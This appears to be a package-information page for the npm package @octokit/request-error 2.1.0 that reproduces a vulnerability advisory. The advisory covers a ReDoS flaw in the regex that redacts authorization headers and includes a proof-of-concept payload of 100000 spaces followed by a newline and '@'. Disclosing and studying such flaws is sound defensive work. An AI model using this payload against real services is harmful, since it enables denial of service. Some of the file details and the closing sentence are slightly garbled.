@octokit/request-error is a crucial npm package for developers utilizing Octokit to interact with the GitHub API. It provides a specialized error class designed to handle and represent errors that occur during Octokit requests, offering more informative and structured error handling compared to generic JavaScript errors.
Version 2.1.0 introduces an increase in the unpacked size of the package, growing from 17431 bytes in version 2.0.6 to 21914 bytes, suggesting potential additions or modifications to the code. Both versions share identical dependencies, including "once," "deprecation," and "@octokit/types," indicating a stable core functionality. Similarly, the development dependencies remain consistent, suggesting no significant changes to the build or testing processes. The release dates indicate both versions were published on the same day. Although seemingly minor, this update in version 2.1.0 could include crucial bug fixes, performance improvements, or enhanced error context, empowering developers with more granular control over error analysis and recovery within their Octokit-powered applications. It is recommended that developers upgrade to the latest version to benefit from any improvements and bug fixes to improve the robustness and stability of their integrations.
All the vulnerabilities related to the version 2.1.0 of the package
@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and "@", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.
The issue occurs at line 52 of iterator.ts in the @octokit/request-error repository.
The vulnerability is caused by the use of an inefficient regular expression in the handling of the authorization header within the request processing logic:
authorization: options.request.headers.authorization.replace(
/ .*$/,
" [REDACTED]"
)
The regular expression / .*$/ matches a space followed by any number of characters until the end of the line. This pattern is vulnerable to Regular Expression Denial of Service (ReDoS) when processing specially crafted input. Specifically, an attacker can send an authorization header containing a long sequence of spaces followed by a newline and "@", such as:
headers: {
authorization: "" + " ".repeat(100000) + "\n@",
}
Due to the way JavaScript's regular expression engine backtracks while attempting to match the space followed by arbitrary characters, this input can cause excessive CPU usage, significantly slowing down or even freezing the server. This leads to a denial-of-service condition, impacting availability.
import { RequestError } from "@octokit/request-error";
const error = new RequestError("Oops", 500, {
request: {
method: "POST",
url: "https://api.github.com/foo",
body: {
bar: "baz",
},
headers: {
authorization: ""+" ".repeat(100000)+"\n@",
},
},
response: {
status: 500,
url: "https://api.github.com/foo",
headers: {
"x-github-request-id": "1:2:3:4",
},
data: {
foo: "bar",
},
},
});
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to an inefficient regular expression (/ .*$/) used to sanitize the authorization header. An attacker can craft a malicious input that triggers excessive backtracking in the regex engine, leading to high CPU consumption and potential denial-of-service (DoS).
authorization headers are at risk, especially those processing a large volume of authentication requests.